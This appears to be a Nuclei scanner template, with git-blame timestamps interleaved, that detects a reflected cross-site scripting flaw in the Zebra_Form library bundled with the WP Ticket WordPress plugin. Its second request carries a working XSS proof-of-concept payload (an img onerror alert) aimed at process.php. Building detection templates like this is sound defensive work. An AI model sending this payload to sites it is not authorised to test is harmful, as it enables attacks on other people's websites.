2021-02-15 18:58:11 +00:00
id : wordpress-zebra-form-xss
2021-02-15 10:43:31 +00:00
info :
2022-09-08 13:28:46 +00:00
name : Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting
2021-02-15 10:43:31 +00:00
author : madrobot
severity : medium
2022-08-10 09:18:17 +00:00
description : |
2022-09-08 13:28:46 +00:00
Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php.
2022-04-22 10:38:41 +00:00
reference :
- https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
2022-09-08 13:28:46 +00:00
classification :
2023-03-03 15:27:54 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score : 5.4
cwe-id : CWE-80
2023-04-28 08:11:21 +00:00
metadata :
2024-06-07 10:04:29 +00:00
max-request : 2
2023-10-14 11:27:55 +00:00
tags : wordpress,xss,wp,wpscan,intrusive
2022-04-22 10:38:41 +00:00
2024-03-26 17:26:22 +00:00
flow : http(1) && http(2)
2023-04-27 04:28:59 +00:00
http :
2024-03-26 17:26:22 +00:00
- raw :
- |
GET /wp-content/plugins/wp-ticket/readme.txt HTTP/1.1
Host : {{Hostname}}
matchers :
- type : word
internal : true
words :
- 'WP Ticket'
- 'Tags:'
condition : and
2021-02-15 10:43:31 +00:00
- raw :
- |
2022-08-10 09:18:17 +00:00
POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
2021-02-15 10:43:31 +00:00
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type : multipart/form-data; boundary=---------------------------77916619616724262872902741074
Origin : null
-----------------------------77916619616724262872902741074
2021-09-08 12:17:19 +00:00
Content-Disposition : form-data; name="upload"; filename="{{randstr}}.txt"
2021-02-15 10:43:31 +00:00
Content-Type : text/plain
Test
-----------------------------77916619616724262872902741074 --
matchers-condition : and
matchers :
- type : word
part : body
2022-08-10 09:18:17 +00:00
words :
- "</script><img src onerror=alert(document.domain)>"
2021-02-15 18:58:11 +00:00
- type : word
2022-08-10 09:18:17 +00:00
part : header
2021-02-15 18:58:11 +00:00
words :
- "text/html"
2022-08-10 09:18:17 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100f1912385227fd7954ebba7838cf733680f67feb8de7878a3f85353faba2904f3022100c0c71def8df50bc1cb9a592bda9245f2a144a43b7eae8b4112db8ef395dca445:922c64590222798bb761d5b6d8e72950